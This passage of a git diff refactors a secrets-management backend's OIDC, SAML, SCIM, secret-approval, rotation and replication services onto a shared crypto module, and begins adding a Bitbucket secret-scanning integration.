@ -107,34 +107,26 @@ export const oidcConfigServiceFactory = ({
  kmsService
 }: TOidcConfigServiceFactoryDep) => {
  const getOidc = async (dto: TGetOidcCfgDTO) => {
-    const org = await orgDAL.findOne({ slug: dto.orgSlug });
-    if (!org) {
+    const oidcCfg = await oidcConfigDAL.findOne({
+      orgId: dto.organizationId
+    });
+    if (!oidcCfg) {
      throw new NotFoundError({
-        message: `Organization with slug '${dto.orgSlug}' not found`,
-        name: "OrgNotFound"
+        message: `OIDC configuration for organization with ID '${dto.organizationId}' not found`
      });
    }
+
    if (dto.type === "external") {
      const { permission } = await permissionService.getOrgPermission(
        dto.actor,
        dto.actorId,
-        org.id,
+        dto.organizationId,
        dto.actorAuthMethod,
        dto.actorOrgId
      );
      ForbiddenError.from(permission).throwUnlessCan(OrgPermissionActions.Read, OrgPermissionSubjects.Sso);
    }

-    const oidcCfg = await oidcConfigDAL.findOne({
-      orgId: org.id
-    });
-
-    if (!oidcCfg) {
-      throw new NotFoundError({
-        message: `OIDC configuration for organization with slug '${dto.orgSlug}' not found`
-      });
-    }
-
    const { decryptor } = await kmsService.createCipherPairWithDataKey({
      type: KmsDataKey.Organization,
      orgId: oidcCfg.orgId
@ -414,7 +406,7 @@ export const oidcConfigServiceFactory = ({

    const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
    const isUserCompleted = Boolean(user.isAccepted);
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
      {
        authTokenType: AuthTokenType.PROVIDER_TOKEN,
        userId: user.id,
@ -465,7 +457,7 @@ export const oidcConfigServiceFactory = ({
  };

  const updateOidcCfg = async ({
-    orgSlug,
+    organizationId,
    allowedEmailDomains,
    configurationType,
    discoveryURL,
@ -484,13 +476,11 @@ export const oidcConfigServiceFactory = ({
    manageGroupMemberships,
    jwtSignatureAlgorithm
  }: TUpdateOidcCfgDTO) => {
-    const org = await orgDAL.findOne({
-      slug: orgSlug
-    });
+    const org = await orgDAL.findOne({ id: organizationId });

    if (!org) {
      throw new NotFoundError({
-        message: `Organization with slug '${orgSlug}' not found`
+        message: `Organization with ID '${organizationId}' not found`
      });
    }

@ -555,7 +545,7 @@ export const oidcConfigServiceFactory = ({
  };

  const createOidcCfg = async ({
-    orgSlug,
+    organizationId,
    allowedEmailDomains,
    configurationType,
    discoveryURL,
@ -574,12 +564,10 @@ export const oidcConfigServiceFactory = ({
    manageGroupMemberships,
    jwtSignatureAlgorithm
  }: TCreateOidcCfgDTO) => {
-    const org = await orgDAL.findOne({
-      slug: orgSlug
-    });
+    const org = await orgDAL.findOne({ id: organizationId });
    if (!org) {
      throw new NotFoundError({
-        message: `Organization with slug '${orgSlug}' not found`
+        message: `Organization with ID '${organizationId}' not found`
      });
    }

@ -639,7 +627,7 @@ export const oidcConfigServiceFactory = ({

    const oidcCfg = await getOidc({
      type: "internal",
-      orgSlug
+      organizationId: org.id
    });

    if (!oidcCfg || !oidcCfg.isActive) {
--- a/backend/src/ee/services/oidc/oidc-config-types.ts
+++ b/backend/src/ee/services/oidc/oidc-config-types.ts
@ -26,11 +26,11 @@ export type TOidcLoginDTO = {
 export type TGetOidcCfgDTO =
  | ({
      type: "external";
-      orgSlug: string;
+      organizationId: string;
    } & TGenericPermission)
  | {
      type: "internal";
-      orgSlug: string;
+      organizationId: string;
    };

 export type TCreateOidcCfgDTO = {
@ -45,7 +45,7 @@ export type TCreateOidcCfgDTO = {
  clientId: string;
  clientSecret: string;
  isActive: boolean;
-  orgSlug: string;
+  organizationId: string;
  manageGroupMemberships: boolean;
  jwtSignatureAlgorithm: OIDCJWTSignatureAlgorithm;
 } & TGenericPermission;
@ -62,7 +62,7 @@ export type TUpdateOidcCfgDTO = Partial<{
  clientId: string;
  clientSecret: string;
  isActive: boolean;
-  orgSlug: string;
+  organizationId: string;
  manageGroupMemberships: boolean;
  jwtSignatureAlgorithm: OIDCJWTSignatureAlgorithm;
 }> &
--- a/backend/src/ee/services/saml-config/saml-config-service.ts
+++ b/backend/src/ee/services/saml-config/saml-config-service.ts
@ -1,8 +1,8 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";

 import { OrgMembershipStatus, TableName, TSamlConfigs, TSamlConfigsUpdate, TUsers } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { AuthTokenType } from "@app/services/auth/auth-type";
 import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service";
@ -148,10 +148,18 @@ export const samlConfigServiceFactory = ({
    let samlConfig: TSamlConfigs | undefined;
    if (dto.type === "org") {
      samlConfig = await samlConfigDAL.findOne({ orgId: dto.orgId });
-      if (!samlConfig) return;
+      if (!samlConfig) {
+        throw new NotFoundError({
+          message: `SAML configuration for organization with ID '${dto.orgId}' not found`
+        });
+      }
    } else if (dto.type === "orgSlug") {
      const org = await orgDAL.findOne({ slug: dto.orgSlug });
-      if (!org) return;
+      if (!org) {
+        throw new NotFoundError({
+          message: `Organization with slug '${dto.orgSlug}' not found`
+        });
+      }
      samlConfig = await samlConfigDAL.findOne({ orgId: org.id });
    } else if (dto.type === "ssoId") {
      // TODO:
@ -303,13 +311,6 @@ export const samlConfigServiceFactory = ({
      });
    } else {
      const plan = await licenseService.getPlan(orgId);
-      if (plan?.slug !== "enterprise" && plan?.memberLimit && plan.membersUsed >= plan.memberLimit) {
-        // limit imposed on number of members allowed / number of members used exceeds the number of members allowed
-        throw new BadRequestError({
-          message: "Failed to create new member via SAML due to member limit reached. Upgrade plan to add more members."
-        });
-      }
-
      if (plan?.slug !== "enterprise" && plan?.identityLimit && plan.identitiesUsed >= plan.identityLimit) {
        // limit imposed on number of identities allowed / number of identities used exceeds the number of identities allowed
        throw new BadRequestError({
@ -411,7 +412,7 @@ export const samlConfigServiceFactory = ({

    const isUserCompleted = Boolean(user.isAccepted);
    const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
      {
        authTokenType: AuthTokenType.PROVIDER_TOKEN,
        userId: user.id,
--- a/backend/src/ee/services/saml-config/saml-config-types.ts
+++ b/backend/src/ee/services/saml-config/saml-config-types.ts
@ -61,20 +61,17 @@ export type TSamlLoginDTO = {
 export type TSamlConfigServiceFactory = {
  createSamlCfg: (arg: TCreateSamlCfgDTO) => Promise<TSamlConfigs>;
  updateSamlCfg: (arg: TUpdateSamlCfgDTO) => Promise<TSamlConfigs>;
-  getSaml: (arg: TGetSamlCfgDTO) => Promise<
-    | {
-        id: string;
-        organization: string;
-        orgId: string;
-        authProvider: string;
-        isActive: boolean;
-        entryPoint: string;
-        issuer: string;
-        cert: string;
-        lastUsed: Date | null | undefined;
-      }
-    | undefined
-  >;
+  getSaml: (arg: TGetSamlCfgDTO) => Promise<{
+    id: string;
+    organization: string;
+    orgId: string;
+    authProvider: string;
+    isActive: boolean;
+    entryPoint: string;
+    issuer: string;
+    cert: string;
+    lastUsed: Date | null | undefined;
+  }>;
  samlLogin: (arg: TSamlLoginDTO) => Promise<{
    isUserCompleted: boolean;
    providerAuthToken: string;
--- a/backend/src/ee/services/scim/scim-service.ts
+++ b/backend/src/ee/services/scim/scim-service.ts
@ -1,6 +1,5 @@
 import { ForbiddenError } from "@casl/ability";
 import slugify from "@sindresorhus/slugify";
-import jwt from "jsonwebtoken";
 import { scimPatch } from "scim-patch";

 import { OrgMembershipRole, OrgMembershipStatus, TableName, TGroups, TOrgMemberships, TUsers } from "@app/db/schemas";
@ -9,6 +8,7 @@ import { addUsersToGroupByUserIds, removeUsersFromGroupByUserIds } from "@app/ee
 import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-group-membership-dal";
 import { TScimDALFactory } from "@app/ee/services/scim/scim-dal";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, NotFoundError, ScimRequestError, UnauthorizedError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { AuthTokenType } from "@app/services/auth/auth-type";
@ -137,7 +137,7 @@ export const scimServiceFactory = ({
      ttlDays
    });

-    const scimToken = jwt.sign(
+    const scimToken = crypto.jwt().sign(
      {
        scimTokenId: scimTokenData.id,
        authTokenType: AuthTokenType.SCIM_TOKEN
--- a/backend/src/ee/services/secret-approval-policy/secret-approval-policy-service.ts
+++ b/backend/src/ee/services/secret-approval-policy/secret-approval-policy-service.ts
@ -55,6 +55,26 @@ export const secretApprovalPolicyServiceFactory = ({
  licenseService,
  secretApprovalRequestDAL
 }: TSecretApprovalPolicyServiceFactoryDep) => {
+  const $policyExists = async ({
+    envId,
+    secretPath,
+    policyId
+  }: {
+    envId: string;
+    secretPath: string;
+    policyId?: string;
+  }) => {
+    const policy = await secretApprovalPolicyDAL
+      .findOne({
+        envId,
+        secretPath,
+        deletedAt: null
+      })
+      .catch(() => null);
+
+    return policyId ? policy && policy.id !== policyId : Boolean(policy);
+  };
+
  const createSecretApprovalPolicy = async ({
    name,
    actor,
@ -106,10 +126,17 @@ export const secretApprovalPolicyServiceFactory = ({
    }

    const env = await projectEnvDAL.findOne({ slug: environment, projectId });
-    if (!env)
+    if (!env) {
      throw new NotFoundError({
        message: `Environment with slug '${environment}' not found in project with ID ${projectId}`
      });
+    }
+
+    if (await $policyExists({ envId: env.id, secretPath })) {
+      throw new BadRequestError({
+        message: `A policy for secret path '${secretPath}' already exists in environment '${environment}'`
+      });
+    }

    let groupBypassers: string[] = [];
    let bypasserUserIds: string[] = [];
@ -260,6 +287,18 @@ export const secretApprovalPolicyServiceFactory = ({
      });
    }

+    if (
+      await $policyExists({
+        envId: secretApprovalPolicy.envId,
+        secretPath: secretPath || secretApprovalPolicy.secretPath,
+        policyId: secretApprovalPolicy.id
+      })
+    ) {
+      throw new BadRequestError({
+        message: `A policy for secret path '${secretPath}' already exists in environment '${secretApprovalPolicy.environment.slug}'`
+      });
+    }
+
    const { permission } = await permissionService.getProjectPermission({
      actor,
      actorId,
--- a/backend/src/ee/services/secret-approval-policy/secret-approval-policy-types.ts
+++ b/backend/src/ee/services/secret-approval-policy/secret-approval-policy-types.ts
@ -4,7 +4,7 @@ import { ApproverType, BypasserType } from "../access-approval-policy/access-app

 export type TCreateSapDTO = {
  approvals: number;
-  secretPath?: string | null;
+  secretPath: string;
  environment: string;
  approvers: ({ type: ApproverType.Group; id: string } | { type: ApproverType.User; id?: string; username?: string })[];
  bypassers?: (
@ -20,7 +20,7 @@ export type TCreateSapDTO = {
 export type TUpdateSapDTO = {
  secretPolicyId: string;
  approvals?: number;
-  secretPath?: string | null;
+  secretPath?: string;
  approvers: ({ type: ApproverType.Group; id: string } | { type: ApproverType.User; id?: string; username?: string })[];
  bypassers?: (
    | { type: BypasserType.Group; id: string }
--- a/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts
+++ b/backend/src/ee/services/secret-approval-request/secret-approval-request-dal.ts
@ -45,7 +45,7 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
        `${TableName.SecretApprovalRequest}.statusChangedByUserId`,
        `statusChangedByUser.id`
      )
-      .join<TUsers>(
+      .leftJoin<TUsers>(
        db(TableName.Users).as("committerUser"),
        `${TableName.SecretApprovalRequest}.committerUserId`,
        `committerUser.id`
@ -173,13 +173,15 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
                username: el.statusChangedByUserUsername
              }
            : undefined,
-          committerUser: {
-            userId: el.committerUserId,
-            email: el.committerUserEmail,
-            firstName: el.committerUserFirstName,
-            lastName: el.committerUserLastName,
-            username: el.committerUserUsername
-          },
+          committerUser: el.committerUserId
+            ? {
+                userId: el.committerUserId,
+                email: el.committerUserEmail,
+                firstName: el.committerUserFirstName,
+                lastName: el.committerUserLastName,
+                username: el.committerUserUsername
+              }
+            : null,
          policy: {
            id: el.policyId,
            name: el.policyName,
@ -377,7 +379,7 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
          `${TableName.SecretApprovalPolicyBypasser}.bypasserGroupId`,
          `bypasserUserGroupMembership.groupId`
        )
-        .join<TUsers>(
+        .leftJoin<TUsers>(
          db(TableName.Users).as("committerUser"),
          `${TableName.SecretApprovalRequest}.committerUserId`,
          `committerUser.id`
@ -488,13 +490,15 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
            enforcementLevel: el.policyEnforcementLevel,
            allowedSelfApprovals: el.policyAllowedSelfApprovals
          },
-          committerUser: {
-            userId: el.committerUserId,
-            email: el.committerUserEmail,
-            firstName: el.committerUserFirstName,
-            lastName: el.committerUserLastName,
-            username: el.committerUserUsername
-          }
+          committerUser: el.committerUserId
+            ? {
+                userId: el.committerUserId,
+                email: el.committerUserEmail,
+                firstName: el.committerUserFirstName,
+                lastName: el.committerUserLastName,
+                username: el.committerUserUsername
+              }
+            : null
        }),
        childrenMapper: [
          {
@ -581,7 +585,7 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
          `${TableName.SecretApprovalPolicyBypasser}.bypasserGroupId`,
          `bypasserUserGroupMembership.groupId`
        )
-        .join<TUsers>(
+        .leftJoin<TUsers>(
          db(TableName.Users).as("committerUser"),
          `${TableName.SecretApprovalRequest}.committerUserId`,
          `committerUser.id`
@ -693,13 +697,15 @@ export const secretApprovalRequestDALFactory = (db: TDbClient) => {
            enforcementLevel: el.policyEnforcementLevel,
            allowedSelfApprovals: el.policyAllowedSelfApprovals
          },
-          committerUser: {
-            userId: el.committerUserId,
-            email: el.committerUserEmail,
-            firstName: el.committerUserFirstName,
-            lastName: el.committerUserLastName,
-            username: el.committerUserUsername
-          }
+          committerUser: el.committerUserId
+            ? {
+                userId: el.committerUserId,
+                email: el.committerUserEmail,
+                firstName: el.committerUserFirstName,
+                lastName: el.committerUserLastName,
+                username: el.committerUserUsername
+              }
+            : null
        }),
        childrenMapper: [
          {
--- a/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts
+++ b/backend/src/ee/services/secret-approval-request/secret-approval-request-service.ts
@ -10,8 +10,9 @@ import {
  TSecretApprovalRequestsSecretsInsert,
  TSecretApprovalRequestsSecretsV2Insert
 } from "@app/db/schemas";
+import { Event, EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { getConfig } from "@app/lib/config/env";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { groupBy, pick, unique } from "@app/lib/fn";
 import { setKnexStringValue } from "@app/lib/knex";
@ -523,7 +524,7 @@ export const secretApprovalRequestServiceFactory = ({
      });
    }

-    const { policy, folderId, projectId, bypassers } = secretApprovalRequest;
+    const { policy, folderId, projectId, bypassers, environment } = secretApprovalRequest;
    if (policy.deletedAt) {
      throw new BadRequestError({
        message: "The policy associated with this secret approval request has been deleted."
@ -819,11 +820,12 @@ export const secretApprovalRequestServiceFactory = ({
                type: SecretType.Shared,
                references: botKey
                  ? getAllNestedSecretReferences(
-                      decryptSymmetric128BitHexKeyUTF8({
+                      crypto.encryption().symmetric().decrypt({
                        ciphertext: el.secretValueCiphertext,
                        iv: el.secretValueIV,
                        tag: el.secretValueTag,
-                        key: botKey
+                        key: botKey,
+                        keySize: SymmetricKeySize.Bits128
                      })
                    )
                  : undefined
@ -864,11 +866,12 @@ export const secretApprovalRequestServiceFactory = ({
                  ]),
                  references: botKey
                    ? getAllNestedSecretReferences(
-                        decryptSymmetric128BitHexKeyUTF8({
+                        crypto.encryption().symmetric().decrypt({
                          ciphertext: el.secretValueCiphertext,
                          iv: el.secretValueIV,
                          tag: el.secretValueTag,
-                          key: botKey
+                          key: botKey,
+                          keySize: SymmetricKeySize.Bits128
                        })
                      )
                    : undefined
@ -957,7 +960,112 @@ export const secretApprovalRequestServiceFactory = ({
      });
    }

-    return mergeStatus;
+    const { created, updated, deleted } = mergeStatus.secrets;
+
+    const secretMutationEvents: Event[] = [];
+
+    if (created.length) {
+      if (created.length > 1) {
+        secretMutationEvents.push({
+          type: EventType.CREATE_SECRETS,
+          metadata: {
+            environment,
+            secretPath: folder.path,
+            secrets: created.map((secret) => ({
+              secretId: secret.id,
+              secretVersion: 1,
+              // @ts-expect-error not present on v1 secrets
+              secretKey: secret.key as string,
+              // @ts-expect-error not present on v1 secrets
+              secretMetadata: secret.secretMetadata as ResourceMetadataDTO
+            }))
+          }
+        });
+      } else {
+        const [secret] = created;
+        secretMutationEvents.push({
+          type: EventType.CREATE_SECRET,
+          metadata: {
+            environment,
+            secretPath: folder.path,
+            secretId: secret.id,
+            secretVersion: 1,
+            // @ts-expect-error not present on v1 secrets
+            secretKey: secret.key as string,
+            // @ts-expect-error not present on v1 secrets
+            secretMetadata: secret.secretMetadata as ResourceMetadataDTO
+          }
+        });
+      }
+    }
+
+    if (updated.length) {
+      if (updated.length > 1) {
+        secretMutationEvents.push({
+          type: EventType.UPDATE_SECRETS,
+          metadata: {
+            environment,
+            secretPath: folder.path,
+            secrets: updated.map((secret) => ({
+              secretId: secret.id,
+              secretVersion: secret.version,
+              // @ts-expect-error not present on v1 secrets
+              secretKey: secret.key as string,
+              // @ts-expect-error not present on v1 secrets
+              secretMetadata: secret.secretMetadata as ResourceMetadataDTO
+            }))
+          }
+        });
+      } else {
+        const [secret] = updated;
+        secretMutationEvents.push({
+          type: EventType.UPDATE_SECRET,
+          metadata: {
+            environment,
+            secretPath: folder.path,
+            secretId: secret.id,
+            secretVersion: secret.version,
+            // @ts-expect-error not present on v1 secrets
+            secretKey: secret.key as string,
+            // @ts-expect-error not present on v1 secrets
+            secretMetadata: secret.secretMetadata as ResourceMetadataDTO
+          }
+        });
+      }
+    }
+
+    if (deleted.length) {
+      if (deleted.length > 1) {
+        secretMutationEvents.push({
+          type: EventType.DELETE_SECRETS,
+          metadata: {
+            environment,
+            secretPath: folder.path,
+            secrets: deleted.map((secret) => ({
+              secretId: secret.id,
+              secretVersion: secret.version,
+              // @ts-expect-error not present on v1 secrets
+              secretKey: secret.key as string
+            }))
+          }
+        });
+      } else {
+        const [secret] = deleted;
+        secretMutationEvents.push({
+          type: EventType.DELETE_SECRET,
+          metadata: {
+            environment,
+            secretPath: folder.path,
+            secretId: secret.id,
+            secretVersion: secret.version,
+            // @ts-expect-error not present on v1 secrets
+            secretKey: secret.key as string
+          }
+        });
+      }
+    }
+
+    return { ...mergeStatus, projectId, secretMutationEvents };
  };

  // function to save secret change to secret approval
@ -1214,7 +1322,7 @@ export const secretApprovalRequestServiceFactory = ({
    });

    const env = await projectEnvDAL.findOne({ id: policy.envId });
-    const user = await userDAL.findById(secretApprovalRequest.committerUserId);
+    const user = await userDAL.findById(actorId);

    await triggerWorkflowIntegrationNotification({
      input: {
@ -1551,7 +1659,7 @@ export const secretApprovalRequestServiceFactory = ({
      return { ...doc, commits: approvalCommits };
    });

-    const user = await userDAL.findById(secretApprovalRequest.committerUserId);
+    const user = await userDAL.findById(actorId);
    const env = await projectEnvDAL.findOne({ id: policy.envId });

    await triggerWorkflowIntegrationNotification({
--- a/backend/src/ee/services/secret-replication/secret-replication-service.ts
+++ b/backend/src/ee/services/secret-replication/secret-replication-service.ts
@ -3,7 +3,7 @@ import { TSecretApprovalPolicyServiceFactory } from "@app/ee/services/secret-app
 import { TSecretApprovalRequestDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-dal";
 import { TSecretApprovalRequestSecretDALFactory } from "@app/ee/services/secret-approval-request/secret-approval-request-secret-dal";
 import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { NotFoundError } from "@app/lib/errors";
 import { groupBy, unique } from "@app/lib/fn";
 import { logger } from "@app/lib/logger";
@ -100,18 +100,20 @@ const getReplicationKeyLockPrefix = (projectId: string, environmentSlug: string,
 export const getReplicationFolderName = (importId: string) => `${ReservedFolders.SecretReplication}${importId}`;

 const getDecryptedKeyValue = (key: string, secret: TSecrets) => {
-  const secretKey = decryptSymmetric128BitHexKeyUTF8({
+  const secretKey = crypto.encryption().symmetric().decrypt({
    ciphertext: secret.secretKeyCiphertext,
    iv: secret.secretKeyIV,
    tag: secret.secretKeyTag,
-    key
+    key,
+    keySize: SymmetricKeySize.Bits128
  });

-  const secretValue = decryptSymmetric128BitHexKeyUTF8({
+  const secretValue = crypto.encryption().symmetric().decrypt({
    ciphertext: secret.secretValueCiphertext,
    iv: secret.secretValueIV,
    tag: secret.secretValueTag,
-    key
+    key,
+    keySize: SymmetricKeySize.Bits128
  });
  return { key: secretKey, value: secretValue };
 };
--- a/backend/src/ee/services/secret-rotation-v2/shared/utils/index.ts
+++ b/backend/src/ee/services/secret-rotation-v2/shared/utils/index.ts
@ -1,4 +1,4 @@
-import { randomInt } from "crypto";
+import { crypto } from "@app/lib/crypto/cryptography";

 type TPasswordRequirements = {
  length: number;
@ -39,7 +39,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
      parts.push(
        ...Array(required.lowercase)
          .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
      );
    }

@ -47,7 +47,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
      parts.push(
        ...Array(required.uppercase)
          .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
      );
    }

@ -55,7 +55,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
      parts.push(
        ...Array(required.digits)
          .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
      );
    }

@ -63,7 +63,7 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
      parts.push(
        ...Array(required.symbols)
          .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
      );
    }

@ -78,12 +78,12 @@ export const generatePassword = (passwordRequirements?: TPasswordRequirements) =
    parts.push(
      ...Array(remainingLength)
        .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
    );

    // shuffle the array to mix up the characters
    for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
      [parts[i], parts[j]] = [parts[j], parts[i]];
    }

--- a/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts
+++ b/backend/src/ee/services/secret-rotation/secret-rotation-queue/secret-rotation-queue.ts
@ -6,8 +6,9 @@ import {
 } from "@aws-sdk/client-iam";

 import { SecretType } from "@app/db/schemas";
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
 import { getConfig } from "@app/lib/config/env";
-import { encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { daysToMillisecond, secondsToMillis } from "@app/lib/dates";
 import { NotFoundError } from "@app/lib/errors";
 import { logger } from "@app/lib/logger";
@ -117,6 +118,7 @@ export const secretRotationQueueFactory = ({
  queue.start(QueueName.SecretRotation, async (job) => {
    const { rotationId } = job.data;
    const appCfg = getConfig();
+
    logger.info(`secretRotationQueue.process: [rotationDocument=${rotationId}]`);
    const secretRotation = await secretRotationDAL.findById(rotationId);
    const rotationProvider = rotationTemplates.find(({ name }) => name === secretRotation?.provider);
@ -225,6 +227,8 @@ export const secretRotationQueueFactory = ({
      if (provider.template.type === TProviderFunctionTypes.AWS) {
        if (provider.template.client === TAwsProviderSystems.IAM) {
          const client = new IAMClient({
+            useFipsEndpoint: crypto.isFipsModeEnabled(),
+            sha256: CustomAWSHasher,
            region: newCredential.inputs.manager_user_aws_region as string,
            credentials: {
              accessKeyId: newCredential.inputs.manager_user_access_key as string,
@ -365,15 +369,22 @@ export const secretRotationQueueFactory = ({
          throw new NotFoundError({
            message: `Project bot not found for project with ID '${secretRotation.projectId}'`
          });
+
        const encryptedSecrets = rotationOutputs.map(({ key: outputKey, secretId }) => ({
          secretId,
-          value: encryptSymmetric128BitHexKeyUTF8(
-            typeof newCredential.outputs[outputKey] === "object"
-              ? JSON.stringify(newCredential.outputs[outputKey])
-              : String(newCredential.outputs[outputKey]),
-            botKey
-          )
+          value: crypto
+            .encryption()
+            .symmetric()
+            .encrypt({
+              plaintext:
+                typeof newCredential.outputs[outputKey] === "object"
+                  ? JSON.stringify(newCredential.outputs[outputKey])
+                  : String(newCredential.outputs[outputKey]),
+              key: botKey,
+              keySize: SymmetricKeySize.Bits128
+            })
        }));
+
        // map the final values to output keys in the board
        await secretRotationDAL.transaction(async (tx) => {
          await secretRotationDAL.updateById(
--- a/backend/src/ee/services/secret-rotation/secret-rotation-service.ts
+++ b/backend/src/ee/services/secret-rotation/secret-rotation-service.ts
@ -2,7 +2,7 @@ import { ForbiddenError, subject } from "@casl/ability";
 import Ajv from "ajv";

 import { ProjectVersion, TableName } from "@app/db/schemas";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { TProjectPermission } from "@app/lib/types";
 import { TKmsServiceFactory } from "@app/services/kms/kms-service";
@ -227,6 +227,7 @@ export const secretRotationServiceFactory = ({

    if (!botKey) throw new NotFoundError({ message: `Project bot not found for project with ID '${projectId}'` });
    const docs = await secretRotationDAL.find({ projectId });
+
    return docs.map((el) => ({
      ...el,
      outputs: el.outputs.map((output) => ({
@ -234,11 +235,12 @@ export const secretRotationServiceFactory = ({
        secret: {
          id: output.secret.id,
          version: output.secret.version,
-          secretKey: decryptSymmetric128BitHexKeyUTF8({
+          secretKey: crypto.encryption().symmetric().decrypt({
            ciphertext: output.secret.secretKeyCiphertext,
            iv: output.secret.secretKeyIV,
            tag: output.secret.secretKeyTag,
-            key: botKey
+            key: botKey,
+            keySize: SymmetricKeySize.Bits128
          })
        }
      }))
--- a/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-constants.ts
+++ b/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-constants.ts
@ -0,0 +1,9 @@
+import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
+import { TSecretScanningDataSourceListItem } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-types";
+import { AppConnection } from "@app/services/app-connection/app-connection-enums";
+
+export const BITBUCKET_SECRET_SCANNING_DATA_SOURCE_LIST_OPTION: TSecretScanningDataSourceListItem = {
+  name: "Bitbucket",
+  type: SecretScanningDataSource.Bitbucket,
+  connection: AppConnection.Bitbucket
+};
--- a/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-factory.ts
+++ b/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-factory.ts
@ -0,0 +1,314 @@
+import { join } from "path";
+
+import { scanContentAndGetFindings } from "@app/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-fns";
+import { SecretMatch } from "@app/ee/services/secret-scanning/secret-scanning-queue/secret-scanning-queue-types";
+import {
+  SecretScanningFindingSeverity,
+  SecretScanningResource
+} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
+import {
+  cloneRepository,
+  convertPatchLineToFileLineNumber,
+  replaceNonChangesWithNewlines
+} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-fns";
+import {
+  TSecretScanningFactoryGetDiffScanFindingsPayload,
+  TSecretScanningFactoryGetDiffScanResourcePayload,
+  TSecretScanningFactoryGetFullScanPath,
+  TSecretScanningFactoryInitialize,
+  TSecretScanningFactoryListRawResources,
+  TSecretScanningFactoryPostInitialization,
+  TSecretScanningFactoryTeardown
+} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-types";
+import { getConfig } from "@app/lib/config/env";
+import { request } from "@app/lib/config/request";
+import { titleCaseToCamelCase } from "@app/lib/fn";
+import { logger } from "@app/lib/logger";
+import { alphaNumericNanoId } from "@app/lib/nanoid";
+import { BasicRepositoryRegex } from "@app/lib/regex";
+import {
+  getBitbucketUser,
+  listBitbucketRepositories,
+  TBitbucketConnection
+} from "@app/services/app-connection/bitbucket";
+import { IntegrationUrls } from "@app/services/integration-auth/integration-list";
+
+import {
+  TBitbucketDataSourceCredentials,
+  TBitbucketDataSourceInput,
+  TBitbucketDataSourceWithConnection,
+  TQueueBitbucketResourceDiffScan
+} from "./bitbucket-secret-scanning-types";
+
+export const BitbucketSecretScanningFactory = () => {
+  const initialize: TSecretScanningFactoryInitialize<
+    TBitbucketDataSourceInput,
+    TBitbucketConnection,
+    TBitbucketDataSourceCredentials
+  > = async ({ connection, payload }, callback) => {
+    const cfg = getConfig();
+
+    const { email, apiToken } = connection.credentials;
+    const authHeader = `Basic ${Buffer.from(`${email}:${apiToken}`).toString("base64")}`;
+
+    const { data } = await request.post<{ uuid: string }>(
+      `${IntegrationUrls.BITBUCKET_API_URL}/2.0/workspaces/${encodeURIComponent(payload.config.workspaceSlug)}/hooks`,
+      {
+        description: "Infisical webhook for push events",
+        url: `${cfg.SITE_URL}/secret-scanning/webhooks/bitbucket`,
+        active: false,
+        events: ["repo:push"]
+      },
+      {
+        headers: {
+          Authorization: authHeader,
+          Accept: "application/json"
